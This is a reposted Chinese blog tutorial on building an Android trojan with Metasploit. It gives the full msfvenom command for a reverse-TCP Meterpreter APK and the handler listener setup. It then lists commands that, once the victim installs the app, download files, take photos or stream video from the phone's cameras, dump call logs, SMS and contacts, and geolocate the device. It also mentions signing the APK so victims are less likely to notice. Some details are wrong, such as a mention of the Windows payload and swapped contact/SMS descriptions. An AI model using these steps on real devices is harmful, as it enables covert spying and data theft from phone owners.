Metasploit之渗透安卓实战



Metasploit之渗透安卓实战

在之前的Metaspoloit使用中都是在Windows系统中,因为渗透的是Windows系统,所以选用了“windows/meterpreter/reverse_tcp”模块。
而这里需要渗透安卓系统了,就选用“android/meterpreter/reverse_tcp”模块。
那么对于kali-linux连接木马的方式还是和之前的一样,利用“exploit/multi/handler”
并且,同样需要选用“windows/meterpreter/reverse_tcp”的PAYLOAD
这里假设我的测试环境
kali-linux: 192.168.2.146
安卓模拟环境:192.168.2.107

一、生成远程安卓木马
msfconsole
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=4444 R > payload.apk

命令解析:
p 设置要使用的payload
LHOST 设置用来接收反弹连接的主机(kali-linux的IP)
LPORT 设置用来接收反弹连接的端口(kali-linux的端口)
R 设置文件格式
Location 要保存的文件位置-->/root/Desktop/是桌面,没有目录表示当前系统Home目录下
PS:对于目前的安卓系统安全机制的考虑,因为没有签名证书可能导致无法安装或易被受害者识破
那么,签名证书的制作可以查看参考文献资料

二、开启metasploit,并且开启相关连接
msfconsole
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.2.146
set LPORT 4444
exploit

三、meterpreter连接
安卓手机安装并且打开木马后会返回我们一个meterpreter连接,那么我们可以使用以下的一些常用的命令:

cd -->目录切换,命令:cd / 切换到根目录
search -->搜索文件,命令:search text.jpg
download -->下载文件,命令:download test.jpg
webcam_list -->查看摄像头列表,因为手机都是前置和后置摄像头了
webcam_snap -->拍照一张,需要选用前置或者后置摄像头,命令:webcam_snap -i 1
webcam_stream -->开启摄像头视频监控,同上,命令:webcam_stream -i 1
安卓系统相关命令:
check_root -->查看当前安卓是否已经root
dump_calllog -->下载通话记录
dump_contacts -->下载短信记录
dump_sms -->下载通讯录
geolocate -->利用谷歌地图定位(需要安装谷歌地图)

猜你喜欢

转载自www.cnblogs.com/Alvin-blog/p/9977879.html
今日推荐